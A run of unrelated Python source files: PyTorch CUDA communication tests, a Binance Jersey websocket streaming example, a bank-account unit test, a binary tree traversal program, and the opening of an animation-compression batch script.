self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
example_binance_jex.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_binance_jex.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://www.lucit.tech/unicorn-binance-websocket-api.html
# Github: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://unicorn-binance-websocket-api.docs.lucit.tech
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
        if oldest_stream_data_from_stream_buffer is False:
            time.sleep(0.01)
        else:
            print(oldest_stream_data_from_stream_buffer)
logging.getLogger("unicorn_binance_websocket_api")
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
# create instance of BinanceWebSocketApiManager for Binance Jersey
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="jex.com", high_performance=True)
# set api key and secret for userData stream
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bb")
omt_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!optionMiniTicker"])
smt_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!spotMiniTicker"])
st_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!spotTicker"])
spot_markets = {'eosbtc', 'ltcbtc', 'ethbtc', 'dashbtc'}
spot_channels = {'spotTrade', 'spotMiniTicker', 'spotDepth20', 'spotDepthUpdate', 'spotTicker'}
binance_websocket_api_manager.create_stream(["spotTrade"], spot_markets)
binance_websocket_api_manager.create_stream(["spotDepth10"], spot_markets)
binance_websocket_api_manager.create_stream(["spotDepth20"], spot_markets)
binance_websocket_api_manager.create_stream(spot_channels, spot_markets)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# show an overview
while True:
binance_websocket_api_manager.print_summary()
#binance_websocket_api_manager.print_stream_info(userdata_stream_id)
time.sleep(1)
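# Graceful shutdown (illustrative sketch, not part of the original example): instead of
# running forever, the summary loop above can be wrapped in try/except KeyboardInterrupt
# and the manager shut down with binance_websocket_api_manager.stop_manager_with_all_streams(),
# which closes all streams and lets the worker thread exit via is_manager_stopping().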
|
bank_account_test.py
|
import sys
import threading
import time
import unittest
from bank_account import BankAccount
class BankAccountTest(unittest.TestCase):
def setUp(self):
self.account = BankAccount()
def test_newly_opened_account_has_zero_balance(self):
self.account.open()
self.assertEqual(self.account.get_balance(), 0)
def test_can_deposit_money(self):
self.account.open()
self.account.deposit(100)
self.assertEqual(self.account.get_balance(), 100)
def test_can_deposit_money_sequentially(self):
self.account.open()
self.account.deposit(100)
self.account.deposit(50)
self.assertEqual(self.account.get_balance(), 150)
def test_can_withdraw_money(self):
self.account.open()
self.account.deposit(100)
self.account.withdraw(50)
self.assertEqual(self.account.get_balance(), 50)
def test_can_withdraw_money_sequentially(self):
self.account.open()
self.account.deposit(100)
self.account.withdraw(20)
self.account.withdraw(80)
self.assertEqual(self.account.get_balance(), 0)
def test_checking_balance_of_closed_account_throws_error(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.get_balance()
def test_deposit_into_closed_account(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.deposit(50)
def test_withdraw_from_closed_account(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.withdraw(50)
def test_cannot_withdraw_more_than_deposited(self):
self.account.open()
self.account.deposit(25)
with self.assertRaises(ValueError):
self.account.withdraw(50)
def test_cannot_withdraw_negative(self):
self.account.open()
self.account.deposit(100)
with self.assertRaises(ValueError):
self.account.withdraw(-50)
def test_cannot_deposit_negative(self):
self.account.open()
with self.assertRaises(ValueError):
self.account.deposit(-50)
def test_can_handle_concurrent_transactions(self):
self.account.open()
self.account.deposit(1000)
for _ in range(10):
self.adjust_balance_concurrently()
def adjust_balance_concurrently(self):
def transact():
self.account.deposit(5)
time.sleep(0.001)
self.account.withdraw(5)
# Greatly improve the chance of an operation being interrupted
# by thread switch, thus testing synchronization effectively
try:
sys.setswitchinterval(1e-12)
except AttributeError:
# For Python 2 compatibility
sys.setcheckinterval(1)
threads = []
for _ in range(1000):
t = threading.Thread(target=transact)
threads.append(t)
t.start()
for thread in threads:
thread.join()
self.assertEqual(self.account.get_balance(), 1000)
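# A minimal sketch of the behavior this suite assumes (hypothetical reference only; the
# real implementation lives in bank_account.py and may differ): a single threading.Lock
# serializes balance updates so the concurrent deposit/withdraw test passes.
class _ReferenceBankAccount:
    def __init__(self):
        self._balance = None          # None means the account is closed
        self._lock = threading.Lock()

    def open(self):
        self._balance = 0

    def close(self):
        self._balance = None

    def get_balance(self):
        with self._lock:
            if self._balance is None:
                raise ValueError("account is not open")
            return self._balance

    def deposit(self, amount):
        with self._lock:
            if self._balance is None or amount < 0:
                raise ValueError("invalid deposit")
            self._balance += amount

    def withdraw(self, amount):
        with self._lock:
            if self._balance is None or amount < 0 or amount > self._balance:
                raise ValueError("invalid withdrawal")
            self._balance -= amount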
if __name__ == '__main__':
unittest.main()
|
tree-orders.py
|
import sys, threading
class TreeOrders:
def read(self):
self.n = int(sys.stdin.readline())
self.key = [0 for i in range(self.n)]
self.left = [0 for i in range(self.n)]
self.right = [0 for i in range(self.n)]
for i in range(self.n):
[a, b, c] = map(int, sys.stdin.readline().split())
self.key[i] = a
self.left[i] = b
self.right[i] = c
# Time Complexity: O(n)
# Space Complexity: O(tree height)
def inOrderTraversal(self, v):
if v == -1:
return
if self.left[v] != -1:
self.inOrderTraversal(self.left[v])
self.result.append(self.key[v])
if self.right[v] != -1:
self.inOrderTraversal(self.right[v])
def inOrder(self):
self.result = []
self.inOrderTraversal(0)
return self.result
# Time Complexity: O(n)
# Space Complexity: O(tree height)
def preOrderTraversal(self, v):
if v == -1:
return
self.result.append(self.key[v])
if self.left[v] != -1:
self.preOrderTraversal(self.left[v])
if self.right[v] != -1:
self.preOrderTraversal(self.right[v])
def preOrder(self):
self.result = []
self.preOrderTraversal(0)
return self.result
# Time Complexity: O(n)
# Space Complexity: O(tree height)
def postOrderTraversal(self, v):
if v == -1:
return
if self.left[v] != -1:
self.postOrderTraversal(self.left[v])
if self.right[v] != -1:
self.postOrderTraversal(self.right[v])
self.result.append(self.key[v])
def postOrder(self):
self.result = []
self.postOrderTraversal(0)
return self.result
def main():
tree = TreeOrders()
tree.read()
print(" ".join(str(x) for x in tree.inOrder()))
print(" ".join(str(x) for x in tree.preOrder()))
print(" ".join(str(x) for x in tree.postOrder()))
if __name__ == '__main__':
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
threading.Thread(target=main).start()
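# Illustrative alternative (not part of the original submission, and not called by main()):
# an explicit stack keeps the O(tree height) space bound while avoiding the raised
# recursion limit and enlarged thread stack needed by the recursive traversals above.
def in_order_iterative(tree):
    result = []
    stack = []
    v = 0 if tree.n > 0 else -1
    while stack or v != -1:
        while v != -1:                  # walk down the left spine
            stack.append(v)
            v = tree.left[v]
        v = stack.pop()                 # visit the node
        result.append(tree.key[v])
        v = tree.right[v]               # then traverse the right subtree
    return result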
|
acl_compressor.py
|
import multiprocessing
import numpy
import os
import platform
import queue
import threading
import time
import signal
import sys
# This script depends on a SJSON parsing package:
# https://pypi.python.org/pypi/SJSON/1.1.0
# https://shelter13.net/projects/SJSON/
# https://bitbucket.org/Anteru/sjson/src
import sjson
def parse_argv():
options = {}
options['acl'] = ""
options['stats'] = ""
options['out'] = ""
options['csv_summary'] = False
options['csv_bit_rate'] = False
options['csv_animated_size'] = False
options['csv_error'] = False
options['refresh'] = False
options['num_threads'] = 1
options['has_progress_bar'] = True
options['stat_detailed'] = False
options['stat_exhaustive'] = False
options['level'] = 'Medium'
options['print_help'] = False
for i in range(1, len(sys.argv)):
value = sys.argv[i]
# TODO: Strip trailing '/' or '\'
if value.startswith('-acl='):
options['acl'] = value[len('-acl='):].replace('"', '')
options['acl'] = os.path.expanduser(options['acl'])
if value.startswith('-stats='):
options['stats'] = value[len('-stats='):].replace('"', '')
options['stats'] = os.path.expanduser(options['stats'])
if value.startswith('-out='):
options['out'] = value[len('-out='):].replace('"', '')
options['out'] = os.path.expanduser(options['out'])
if value == '-csv_summary':
options['csv_summary'] = True
if value == '-csv_bit_rate':
options['csv_bit_rate'] = True
if value == '-csv_animated_size':
options['csv_animated_size'] = True
if value == '-csv_error':
options['csv_error'] = True
if value == '-refresh':
options['refresh'] = True
if value == '-no_progress_bar':
options['has_progress_bar'] = False
if value == '-stat_detailed':
options['stat_detailed'] = True
if value == '-stat_exhaustive':
options['stat_exhaustive'] = True
if value.startswith('-parallel='):
options['num_threads'] = int(value[len('-parallel='):].replace('"', ''))
if value.startswith('-level='):
options['level'] = value[len('-level='):].replace('"', '').capitalize()
if value == '-help':
options['print_help'] = True
if options['print_help']:
print_help()
sys.exit(1)
if len(options['acl']) == 0:
        print('ACL input directory not provided')
print_usage()
sys.exit(1)
if len(options['stats']) == 0:
        print('Stat output directory not provided')
print_usage()
sys.exit(1)
if options['num_threads'] <= 0:
print('-parallel switch argument must be greater than 0')
print_usage()
sys.exit(1)
if not os.path.exists(options['acl']) or not os.path.isdir(options['acl']):
print('ACL input directory not found: {}'.format(options['acl']))
print_usage()
sys.exit(1)
if not os.path.exists(options['stats']):
os.makedirs(options['stats'])
if not os.path.isdir(options['stats']):
print('The output stat argument must be a directory')
print_usage()
sys.exit(1)
return options
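# Example invocation (the paths below are placeholders):
#   python acl_compressor.py -acl=./clips -stats=./stats -csv_summary -parallel=4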
def print_usage():
print('Usage: python acl_compressor.py -acl=<path to directory containing ACL files> -stats=<path to output directory for stats> [-csv_summary] [-csv_bit_rate] [-csv_animated_size] [-csv_error] [-refresh] [-parallel={Num Threads}] [-help]')
def print_help():
print('Usage: python acl_compressor.py [arguments]')
print()
print('Arguments:')
print(' The -acl and -stats arguments are required; all other arguments are optional.')
print(' -acl=<path>: Input directory tree containing clips to compress.')
print(' -stats=<path>: Output directory tree for the stats to output.')
print(' -out=<path>: Output directory tree for the compressed binaries to output.')
print(' -csv_summary: Generates a basic summary CSV file with various clip information and statistics.')
print(' -csv_bit_rate: Generates a CSV with the bit rate usage frequency by the variable quantization algorithm. The executable must be compiled with detailed statistics enabled.')
print(' -csv_animated_size: Generates a CSV with statistics about the animated size of key frames. The executable must be compiled with detailed statistics enabled.')
print(' -csv_error: Generates a CSV with the error for every bone at every key frame. The executable must be compiled with exhaustive statistics enabled.')
print(' -refresh: If an output stat file already exists for a particular clip, it is recompressed anyway instead of being skipped.')
print(' -parallel=<Num Threads>: Allows multiple clips to be compressed and processed in parallel.')
print(' -no_progress_bar: Suppresses the progress bar output.')
print(' -stat_detailed: Enables detailed stat logging.')
print(' -stat_exhaustive: Enables exhaustive stat logging.')
print(' -level=<level>: Compression level forwarded to the compressor executable (default: Medium).')
print(' -help: Prints this help message.')
def print_stat(stat):
print('Algorithm: {}, Format: [{}], Ratio: {:.2f}, Error: {:.4f}'.format(stat['algorithm_name'], stat['desc'], stat['compression_ratio'], stat['max_error']))
print('')
def bytes_to_mb(size_in_bytes):
return size_in_bytes / (1024.0 * 1024.0)
def bytes_to_kb(size_in_bytes):
return size_in_bytes / 1024.0
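# Formats a duration in seconds as 'HHh MMm SS.SSs',
# e.g. format_elapsed_time(3723.5) returns '01h 02m 03.50s'.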
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
def sanitize_csv_entry(entry):
return entry.replace(', ', ' ').replace(',', '_')
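# create_csv opens one CSV file per requested report (-csv_summary, -csv_bit_rate,
# -csv_animated_size, -csv_error) and writes the corresponding header row.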
def create_csv(options):
csv_data = {}
stat_dir = options['stats']
if options['csv_summary']:
stats_summary_csv_filename = os.path.join(stat_dir, 'stats_summary.csv')
stats_summary_csv_file = open(stats_summary_csv_filename, 'w')
csv_data['stats_summary_csv_file'] = stats_summary_csv_file
print('Generating CSV file {} ...'.format(stats_summary_csv_filename))
print('Clip Name, Algorithm Name, Raw Size, Compressed Size, Compression Ratio, Compression Time, Clip Duration, Num Animated Tracks, Max Error, Num Transforms, Num Samples Per Track, Quantization Memory Usage', file = stats_summary_csv_file)
if options['csv_bit_rate']:
stats_bit_rate_csv_filename = os.path.join(stat_dir, 'stats_bit_rate.csv')
stats_bit_rate_csv_file = open(stats_bit_rate_csv_filename, 'w')
csv_data['stats_bit_rate_csv_file'] = stats_bit_rate_csv_file
print('Generating CSV file {} ...'.format(stats_bit_rate_csv_filename))
print('Algorithm Name, 0, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 32', file = stats_bit_rate_csv_file)
if options['csv_animated_size']:
stats_animated_size_csv_filename = os.path.join(stat_dir, 'stats_animated_size.csv')
stats_animated_size_csv_file = open(stats_animated_size_csv_filename, 'w')
csv_data['stats_animated_size_csv_file'] = stats_animated_size_csv_file
print('Generating CSV file {} ...'.format(stats_animated_size_csv_filename))
print('Algorithm Name, Segment Index, Animated Size, Num Animated Tracks', file = stats_animated_size_csv_file)
if options['csv_error']:
stats_error_csv_filename = os.path.join(stat_dir, 'stats_error.csv')
stats_error_csv_file = open(stats_error_csv_filename, 'w')
csv_data['stats_error_csv_file'] = stats_error_csv_file
print('Generating CSV file {} ...'.format(stats_error_csv_filename))
print('Clip Name, Key Frame, Bone Index, Error', file = stats_error_csv_file)
return csv_data
def close_csv(csv_data):
if len(csv_data) == 0:
return
if 'stats_summary_csv_file' in csv_data:
csv_data['stats_summary_csv_file'].close()
